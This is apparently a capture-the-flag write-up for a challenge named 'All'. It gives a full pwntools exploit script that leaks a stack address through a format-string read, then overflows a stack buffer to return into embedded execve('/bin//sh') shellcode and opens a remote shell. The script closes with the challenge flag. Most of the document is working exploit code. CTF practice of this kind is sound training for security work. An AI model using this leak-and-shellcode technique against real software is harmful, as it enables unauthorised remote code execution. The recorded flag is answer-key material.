All
- Score: 181
- Technique:
FmtStr (format-string read used to leak a stack address)
Shellcode (stack buffer overflow that returns into shellcode placed on the stack)
What if I just.... put ALL the vulnerabilities in there? With no mitigations?
Script
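from pwn import *

HOST, PORT = 'all.chal.cyberjousting.com', 1348

# Stack layout the payload is built against. Offsets are relative to the
# start of the input buffer and are binary-specific: they were found for the
# challenge binary (the leak index via the probe loop in dump_stack), not
# derived here.
BUF_SIZE = 32         # bytes from the buffer start to the saved rbp
SAVED_RBP_SIZE = 8
LEAK_TO_BUF = 0x40    # the %10$p leak is this far above the buffer start
LEAK_INDEX = 10       # positional format-string argument that holds the leak

# Leading command word. The NUL makes any C string compare stop here, so the
# shellcode that follows is not part of the compared string; presumably the
# program matches "quit" to leave main and trigger the overwritten return
# address -- confirm against the binary.
CMD = b'quit\x00'

# x86-64 execve("/bin//sh", NULL, NULL) via raw syscall (rax=0x3b), 23 bytes,
# no NUL bytes, so it survives C string handling.
SHELL = (b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
         b"\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05")


def dump_stack(r, count=30):
    """Print the first `count` positional format-string arguments.

    Discovery helper: each probe asks the vulnerable printf for one stack
    word, which is how LEAK_INDEX was chosen. Consumes one line of output
    per probe, so use it on a fresh connection, not mid-exploit.
    """
    for i in range(count):
        r.sendline(b'AAAA %%%d$p' % i)
        print("%d - %s" % (i, r.recvuntil(b'\n').strip()))


def build_payload(buf, ret_gadget):
    """Return the overflow payload for an input buffer located at `buf`.

    Layout: CMD | SHELL | NOP padding up to BUF_SIZE | fake saved rbp |
    ret gadget (overwritten return address) | address of SHELL.
    The ret gadget is a no-op trampoline that pops the shellcode address;
    raw-syscall shellcode does not need the stack alignment a libc call
    would, so this is belt-and-braces rather than required.

    Raises ValueError if CMD plus SHELL no longer fit in BUF_SIZE -- the
    original arithmetic silently produced empty padding and shifted every
    later offset.
    """
    pad = BUF_SIZE - len(CMD) - len(SHELL)
    if pad < 0:
        raise ValueError(
            "shellcode (%d bytes) does not fit in the %d-byte buffer after %r"
            % (len(SHELL), BUF_SIZE, CMD))
    shell_addr = buf + len(CMD)
    return (CMD + SHELL + b'\x90' * pad
            + b'B' * SAVED_RBP_SIZE
            + p64(ret_gadget)
            + p64(shell_addr))


def exploit():
    """Leak a stack pointer with the format string, then overflow into shellcode."""
    elf = context.binary = ELF('./all')   # sets arch so asm('ret') assembles for x86-64
    r = remote(HOST, PORT)

    # Stage 1: format-string read. The binary echoes the formatted input, so
    # one %N$p gives back a stack word; parse it as hex (int() accepts "0x").
    r.sendline(b'%%%d$p' % LEAK_INDEX)
    leaked = int(r.recvuntil(b'\n').strip(), 16)
    buf = leaked - LEAK_TO_BUF
    log.info("leaked stack word 0x%x -> buffer at 0x%x", leaked, buf)

    # Stage 2: overflow. NX is off (shellcode runs from the stack) and there
    # is no canary, per the challenge description. sendline appends '\n'
    # after the last address; it lands beyond the return slot and is unused.
    ret = next(elf.search(asm('ret')))
    r.sendline(build_payload(buf, ret))
    r.interactive()


if __name__ == '__main__':
    exploit()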
Flag
byuctf{too_many_options_what_do_I_chooooooose}